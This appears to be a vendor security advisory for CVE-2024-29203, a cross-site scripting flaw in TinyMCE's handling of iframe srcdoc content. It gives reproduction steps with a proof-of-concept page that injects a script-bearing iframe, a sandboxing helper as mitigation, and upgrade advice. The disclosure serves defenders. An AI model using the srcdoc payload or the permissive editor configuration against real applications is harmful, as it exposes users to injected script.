CVE-2024-29203

Cross-Site Scripting
Affects
TinyMCE
Versions
<6.8.0
Patch Available

This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

TinyMCE is a web-based JavaScript HTML WYSIWYG editor control.

A Cross-Site Scripting (XSS) vulnerability (CVE-2024-29203) has been identified in TinyMCE, which allows iframe elements containing malicious code to execute when inserted into the editor. Attacks are limited by same-origin browser protections, but could still trigger operations such as downloading of malicious assets.

Per OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.

This issue affects TinyMCE versions less than 6.8.0.

Details

Module Info

*: The fix is opt-in in v6.8.0 and is enabled by default in v7.0.0.

Vulnerability Info

This Medium-severity vulnerability is found in TinyMCE versions less than 6.8.0.

In versions 6.8.0 and later, the vulnerability can be resolved directly by setting the editor option sandbox_iframes to true. In 6.8.x this option defaults to false; from version 7.0.0 it defaults to true.

Steps To Reproduce

  • Create a folder and name it public. Copy the TinyMCE files into this folder so that the path ./public/tinymce/tinymce.min.js is valid. For example, if you used npm to install tinymce, copy the contents of the folder node_modules/tinymce into public/tinymce.
  • Create an HTML file next to the public folder that was just created. Add the self-hosted TinyMCE script to the <head> section. For example:
<script src="public/tinymce/tinymce.min.js"></script>

  • In the body of the HTML file, add a section with a button and a textarea. This is where the XSS via iframe[srcdoc] will be displayed. For example:
<div>
  <button onclick="injectIframePayload()">Inject iframe[srcdoc] Payload</button>
  <textarea id="editor"></textarea>
</div>

  • Add an instance of TinyMCE in a <script> section. For example:
let editor;

tinymce.init({
  selector: '#editor',
  extended_valid_elements: 'iframe[src|srcdoc|sandbox]',
  setup: (editorInstance) => {
    // keep a handle on the editor instance for the payload function below
    editor = editorInstance;
  }
});

  • In the same <script> section, add the injectIframePayload function referenced by the button's onclick handler in the third step. For example:
function injectIframePayload() {
  const html = `<iframe srcdoc="<script>alert('CVE-2024-29203')<\/script>"></iframe>`;
  editor?.setContent(html);
}

  • Run the application and click the Inject iframe[srcdoc] Payload button. A popup will appear, demonstrating the Cross-Site Scripting (XSS) vulnerability.
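To see the effect of the sandbox_iframes mitigation without a browser, here is an added example (not code from the advisory or from TinyMCE): a Node.js helper that rewrites every iframe in an HTML fragment to carry an empty sandbox attribute, which is the behaviour the option enables. The helper and its sample inputs are constructed for this illustration; it is an approximation that overwrites any existing sandbox value rather than a full HTML parser.

```javascript
// Added example, not TinyMCE's own code: emulates outside a browser what the
// sandbox_iframes editor option does to inserted content. Every <iframe> in an
// HTML fragment is given sandbox="" (no scripts, forms or same-origin access),
// which makes a srcdoc payload like the one above inert when rendered.
// Assumption: an existing sandbox attribute is overwritten with the empty value.

// Index of the unquoted '>' that closes a tag, scanning from `pos`.
function findTagEnd(html, pos) {
  let quote = null;
  for (let i = pos; i < html.length; i++) {
    const c = html[i];
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
    else if (c === '>') return i;
  }
  return -1;
}

// Attributes of one tag body as a Map (names lowercased, bare names map to '').
function parseAttrs(body) {
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>`]+)))?/g;
  const attrs = new Map();
  for (const m of body.matchAll(re)) {
    attrs.set(m[1].toLowerCase(), m[2] ?? m[3] ?? m[4] ?? '');
  }
  return attrs;
}

// Rewrite each <iframe ...> start tag so that it carries sandbox="".
function sandboxIframes(html) {
  const re = /<iframe(?=[\s\/>])/gi;
  let out = '', last = 0, m;
  while ((m = re.exec(html)) !== null) {
    const bodyStart = m.index + m[0].length;
    const end = findTagEnd(html, bodyStart);
    if (end === -1) break;              // unterminated tag: copy the rest verbatim
    const attrs = parseAttrs(html.slice(bodyStart, end));
    attrs.set('sandbox', '');           // the hardening step
    const rebuilt = [...attrs]
      .map(([k, v]) => `${k}="${v.replace(/"/g, '&quot;')}"`).join(' ');
    out += html.slice(last, m.index) + '<iframe' + (rebuilt ? ' ' + rebuilt : '') + '>';
    last = end + 1;
    re.lastIndex = last;
  }
  return out + html.slice(last);
}
```

Run it over the srcdoc payload from the steps above and the iframe comes back with sandbox="", so the embedded script never executes.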

Proof Of Concept

A full reproduction with code similar to the above can be found here:

HTML injection XSS vulnerability POC: see the Pen "TinyMCE vulnerability: XSS vulnerability in Handling Iframes" by HeroDevs (@herodevs) on CodePen: https://codepen.io/herodevs/pen/xbGyjyv/299b960421ba116f94e660cfb2d3d4f8

Mitigation

TinyMCE versions below 6.8 are End-of-Life and will not receive any updates to address this issue. For more information see here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications to a version of TinyMCE that includes the fix.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Vulnerability Details

ID: CVE-2024-29203
Project Affected: TinyMCE
Versions Affected: <6.8.0
Published date: July 30, 2025
≈ Fix date: June 13, 2025
Fixed in:
Severity: Medium (CVSS severity scale: Low >=0 <4, Medium >=4 <6, High >=6 <8, Critical >=8 <10)
Category: Cross-Site Scripting